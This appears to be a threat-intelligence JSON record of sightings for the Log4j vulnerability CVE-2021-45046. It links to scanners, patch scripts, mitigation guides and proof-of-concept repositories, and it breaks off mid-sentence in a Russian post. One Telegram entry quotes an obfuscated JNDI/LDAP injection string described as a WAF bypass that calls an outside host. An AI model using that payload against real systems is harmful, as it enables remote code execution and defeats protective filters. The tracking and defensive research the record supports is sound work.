{"vulnerability": "CVE-2021-45046", "sightings": [{"uuid": "737b9967-36f9-400d-b01f-17ac0075eaef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/e804ed63-36a3-438d-b753-08a9c5ca89d8", "content": "", "creation_timestamp": "2021-12-22T20:43:05.000000Z"}, {"uuid": "633aba7d-de33-4c3d-9255-4b679f542428", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/8bf50bb8-94dd-4004-a646-5f78db6f0b6a", "content": "", "creation_timestamp": "2022-07-13T13:02:16.000000Z"}, {"uuid": "4f91e801-aaeb-44d5-ae4f-10c9775ecf67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "ca8e149b-805e-4beb-97b2-d73b04468bf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971808", "content": "", "creation_timestamp": "2024-12-24T20:34:18.933768Z"}, {"uuid": "dc28d743-114f-4f96-9572-57a15e63f011", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "c678c1af-ba0f-4796-9941-28487ef2cfd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:41.000000Z"}, {"uuid": "b4694937-2c3c-4af7-b786-0e0d821e81ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/log4shell_scanner.rb", "content": "", "creation_timestamp": "2021-12-16T17:05:03.000000Z"}, {"uuid": "137c074c-2ad2-4c93-9d79-50e1adb3cc54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://gist.github.com/c0axial/f499717d0046678e19e2f0d43b9d4b55", "content": "", "creation_timestamp": "2025-08-14T14:03:30.000000Z"}, {"uuid": "85efc623-5bac-4ab4-886b-f1a5e1d99ccf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:32.000000Z"}, {"uuid": "f8a10e74-2d46-4930-8ae9-eef0279b7204", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://gist.github.com/David-VTUK/6dfab9be82c272a427aef0162ae3eb31", "content": "", "creation_timestamp": "2025-05-27T11:37:39.000000Z"}, {"uuid": "1c40f2d6-e038-4cf7-9ba8-f66b3adcf6f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1109", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aBurp extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046\nURL\uff1ahttps://github.com/DXC-StrikeForce/Burp-Log4Shell-Active-Scanner", "creation_timestamp": "2021-12-16T12:56:36.000000Z"}, {"uuid": "04353259-719c-4268-8fa5-781c6f97d4a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/f3aa2676-c093-4d57-9d05-af8a1125e178", "content": "", "creation_timestamp": "2026-02-02T12:27:00.179910Z"}, {"uuid": "b815b2e2-bc75-4bd0-b806-193238065571", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1115", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScanner local em Python para localizar e identificar vers\u00f5es vulner\u00e1veis do Log4j2 em arquivos no disco com an\u00e1lise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046)\nURL\uff1ahttps://github.com/andalik/log4j-scanner", "creation_timestamp": "2021-12-16T14:31:58.000000Z"}, {"uuid": "2b2b1d8e-535c-4099-871a-375475f96955", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1090", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aReplicating CVE-2021-45046\nURL\uff1ahttps://github.com/tejas-nagchandi/CVE-2021-45046", "creation_timestamp": "2021-12-15T16:35:02.000000Z"}, {"uuid": "8228516f-614e-42d6-9b92-c02ef00e3492", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/GithubRedTeam/1209", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4J CVE-2021-44228 : Mitigation Cheat Sheet\nURL\uff1ahttps://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105", "creation_timestamp": "2021-12-22T05:41:25.000000Z"}, {"uuid": "3c9b8605-ad2d-40df-82c3-f23906bbbf42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1110", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aBurp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 an CVE-2021-45046\nURL\uff1ahttps://github.com/freskimo/Burp-Log4j-HammerTime", "creation_timestamp": "2021-12-16T13:18:21.000000Z"}, {"uuid": "221472ff-47f5-4ae1-9f41-dd4776b1e998", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:13:00.000000Z"}, {"uuid": "25f4e882-c312-443d-a046-eb2f7dad6ae9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=700", "content": "", "creation_timestamp": "2021-12-10T04:00:00.000000Z"}, {"uuid": "57b08e71-b468-4ce0-aa9b-7049a7fbea29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/cKure/8423", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046)\n\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/", "creation_timestamp": "2021-12-15T18:34:13.000000Z"}, {"uuid": "886b5e68-fe6b-49d3-a1c5-232b0c26c847", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1310", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExplanation of CVE-2021-45046 for classroom use\nURL\uff1ahttps://github.com/Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java", "creation_timestamp": "2022-01-13T03:37:42.000000Z"}, {"uuid": "f000c12d-2fcc-4d7c-b8bc-3f2fc9348f17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1165", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSearches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances, including embedded (jar/war/zip) packaged ones.\nURL\uff1ahttps://github.com/HynekPetrak/log4shell_finder", "creation_timestamp": "2021-12-19T01:02:30.000000Z"}, {"uuid": "db830833-cf93-4a2c-96b3-d934d9fd4bca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1139", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aProvide patched version of Log4J against CVE-2021-44228 and CVE-2021-45046 as well as a script to manually patch it yourself\nURL\uff1ahttps://github.com/Aschen/log4j-patched", "creation_timestamp": "2021-12-17T16:39:58.000000Z"}, {"uuid": "773cffd5-bdde-4e8f-b718-45fc422603d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/GithubRedTeam/1184", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j \u6f0f\u6d1e\u672c\u5730\u68c0\u6d4b\u811a\u672c\u3002 Scan all java processes on your host to check weather it's affected by log4j2 remote code execution(CVE-2021-45046)\nURL\uff1ahttps://github.com/lijiejie/log4j2_vul_local_scanner", "creation_timestamp": "2021-12-20T12:10:02.000000Z"}, {"uuid": "6071bc42-23ba-4a31-82e2-065dbaa1e493", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1081", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j 2.15.0 Privilege Escalation -- CVE-2021-45046\nURL\uff1ahttps://github.com/cckuailong/Log4j_CVE-2021-45046", "creation_timestamp": "2021-12-15T05:50:40.000000Z"}, {"uuid": "c1a83c42-ceb1-4440-8560-8138b16ef156", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1197", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSearches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances of log4j library, including embedded (jar/war/zip) packaged ones.\nURL\uff1ahttps://github.com/HynekPetrak/log4shell-finder", "creation_timestamp": "2021-12-21T12:28:27.000000Z"}, {"uuid": "8279d69e-c3d2-4782-b85b-ddb2f98d0cae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1167", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aAn Inspec profile to check for Log4j CVE-2021-44228 and CVE-2021-45046\nURL\uff1ahttps://github.com/trickyearlobe/inspec-log4j", "creation_timestamp": "2021-12-19T05:27:09.000000Z"}, {"uuid": "c55698c1-38bb-45d1-86b8-5c573b7f2e1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/GithubRedTeam/1166", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aVulerability analysis, patch management and exploitation tool CVE-2021-44228 / CVE-2021-45046 / CVE-2021-4104\nURL\uff1ahttps://github.com/TheInterception/Log4J-Simulation-Tool", "creation_timestamp": "2021-12-19T05:14:34.000000Z"}, {"uuid": "f38ae536-d08b-421b-a206-da4aaa480538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1119", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aBurp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046\nURL\uff1ahttps://github.com/DXC-StrikeForce/Burp-Log4j-HammerTime", "creation_timestamp": "2021-12-16T16:59:08.000000Z"}, {"uuid": "e98b382b-17b3-48d8-bcb9-e3a5b2e5c64e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1118", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScanner local em Python para varredura e localiza\u00e7\u00e3o de vers\u00f5es vulner\u00e1veis do Log4j2 em arquivos no disco, contemplando an\u00e1lise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046)\nURL\uff1ahttps://github.com/andalik/log4j-filescan", "creation_timestamp": "2021-12-16T16:02:49.000000Z"}, {"uuid": "ab137106-b63e-42ca-85d6-6b59afc427cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1122", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSamples of log4j library versions to help log4j scanners / detectors improve their accuracy for detecting CVE-2021-45046 and CVE-2021-44228.\nURL\uff1ahttps://github.com/mergebase/log4j-samples", "creation_timestamp": "2021-12-16T21:04:20.000000Z"}, {"uuid": "a3562db3-b14f-43cf-87c9-3e9052971e1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1145", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA simple script to remove Log4J JndiLookup.class from jars in a given directory, to temporarily protect from CVE-2021-45046 and CVE-2021-44228.\nURL\uff1ahttps://github.com/lukepasek/log4jjndilookupremove", "creation_timestamp": "2021-12-17T20:43:16.000000Z"}, {"uuid": "8205aaa1-03f4-45ba-ac83-3bccd49a3103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1147", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1acan find, analyse and patch Log4J files because of CVE-2021-44228, CVE-2021-45046\nURL\uff1ahttps://github.com/DANSI/PowerShell-Log4J-Scanner", "creation_timestamp": "2021-12-18T00:56:11.000000Z"}, {"uuid": "94902364-cb22-4f2c-8970-0e93a735d251", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/cKure/8469", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Log4J v2.15.0 Patch Bypass\n\nRCE Log4j-scan can now discover the new patch bypass on v2.15.0 (CVE-2021-45046).\n\nBypass for AWS WAF for log4j jndi injection:\n\n${j $ {k 8s :k5:-ND }i${sd: k5:-:}ldap://mydogsbutt.c om: 13 89/o}\n\nSource: https://twitter.com/11xuxx/status/1471236310299906050", "creation_timestamp": "2021-12-23T12:07:21.000000Z"}, {"uuid": "e392b77a-46eb-467c-9728-8a069490d93e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "MISP/4d26c5b0-4bc5-443c-8641-553684788bdc", "content": "", "creation_timestamp": "2026-04-19T22:45:30.000000Z"}, {"uuid": "55a8ebe4-fca3-4c91-8552-796fb7b16c3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/GithubRedTeam/1262", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4J CVE-2021-44228 : Mitigation Cheat Sheet\nURL\uff1ahttps://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832", "creation_timestamp": "2022-01-03T17:46:59.000000Z"}, {"uuid": "e3a0ad2c-062a-4cfb-b02c-f9da509eb4eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1226", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4Shell(CVE-2021-45046) Sandbox Signature\nURL\uff1ahttps://github.com/CaptanMoss/Log4Shell-Sandbox-Signature", "creation_timestamp": "2021-12-24T09:04:52.000000Z"}, {"uuid": "bb19f9c2-2e8c-484d-a371-e9a7e1ee6b15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/GithubRedTeam/1236", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4Shell(CVE-2021-45046) Sandbox Signature\nURL\uff1ahttps://github.com/CaptanMoss/Log4Shell-Sandbox-Signature", "creation_timestamp": "2021-12-26T19:38:10.000000Z"}, {"uuid": "23078f22-091b-4180-862c-eeffeecb166a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1309", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExplanation of CVE-2021-45046 for classroom use\nURL\uff1ahttps://github.com/taise-hub/log4j-poc", "creation_timestamp": "2022-01-13T03:08:04.000000Z"}, {"uuid": "628b769c-9ea6-46ec-9a3f-4e0c879f2911", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/pesni_rogozina/16967", "content": "\u200b\u200b\u0415\u0449\u0435 \u0440\u0430\u0437\nMerry Christmas! \n Log4shell \u0432\u0441\u0435 \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043e\u0442\u0441\u0442\u0443\u043f\u0438\u0442. \u041a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b \u0441 \u0442\u0435\u0445 \u043f\u043e\u0440, \u043a\u0430\u043a \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u043d\u0430\u0447\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u0438\u043d\u043d\u0430\u044f \u044d\u043f\u043e\u043f\u0435\u044f \u0441 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 0-day \u0432\nlog4j, \u0434\u043b\u044f \u043c\u043d\u043e\u0433\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f 2. 16 \u043d\u0430 \u043a\u0430\u043a\u043e\u0435-\u0442\u043e \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u0432\u044b\u0445\u043e\u0434\u043e\u043c \u0438\u0437 \u0441\u043b\u043e\u0436\u043d\u043e\u0439 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438. \u041d\u043e, \u043a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u043e\u0441\u044c, \u043e\u043d\u0430 \u0432\u043a\u043b\u044e\u0447\u0430\u043b\u0430 \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0431\u0430\u0433\u0438 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0438 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043d\u043e\u0432\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0438 \u0441 \u0432\u044b\u0445\u043e\u0434\u043e\u043c \u0432\u0435\u0440\u0441\u0438\u0438 2. 17. 0. \n \u0414\u0435\u043b\u043e \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u0432\u0435\u0440\u0441\u0438\u044f \u041f\u041e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0430\n\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u043a\u0430\u0437\u0430 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 (\nDoS), \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u044b\u043b \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d CVE-2021-45105. \u041e\u0448\u0438\u0431\u043a\u0430 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a 2. 15. 0 \u0431\u044b\u043b \u043f\u0440\u0438\u0437\u043d\u0430\u043d \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c \u043a \u043d\u0435\u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\nDoS (CVE-2021-45046). \u041f\u043e\u0437\u0436\u0435 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u0431\u044b\u043b \u043f\u043e\u0432\u044b\u0448\u0435\u043d\nApache \u0441 \u043d\u0438\u0437\u043a\u043e\u0433\u043e (3,7) \u0434\u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e (9,0) \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u043d\u043e\u0432\u044b\u0435 \u043e\u0431\u0445\u043e\u0434\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 \u043a\u0440\u0430\u0441\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c. \n \u041f\u043e\u0441\u043b\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e \u043e\u0431\u0441\u0443\u0436\u0434\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0442\u0440\u0451\u0445 \u0434\u043d\u0435\u0439\nApache \u043f\u0440\u0438\u0441\u0432\u043e\u0438\u043b \u043d\u043e\u0432\u0443\u044e CVE \u0438\n\u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043d\u043e\u0432\u0443\u044e \u043f\u0440\u043e\u043f\u0435\u0447\u0435\u043d\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e log4j 2. 17. 0. \n CVE-2021-45105 \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0439 \u00ab\u0432\u044b\u0441\u043e\u043a\u0438\u0439\u00bb (7,5) \u0431\u0430\u043b\u043b \u043f\u043e \u0448\u043a\u0430\u043b\u0435\nCVSS, \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443\nlog4j 2. 16 \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u0437\u0430\u0449\u0438\u0449\u0430\u0435\u0442 \u043e\u0442 \u043d\u0435\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u043e\u0439 \u0440\u0435\u043a\u0443\u0440\u0441\u0438\u0438 \u043f\u0440\u0438 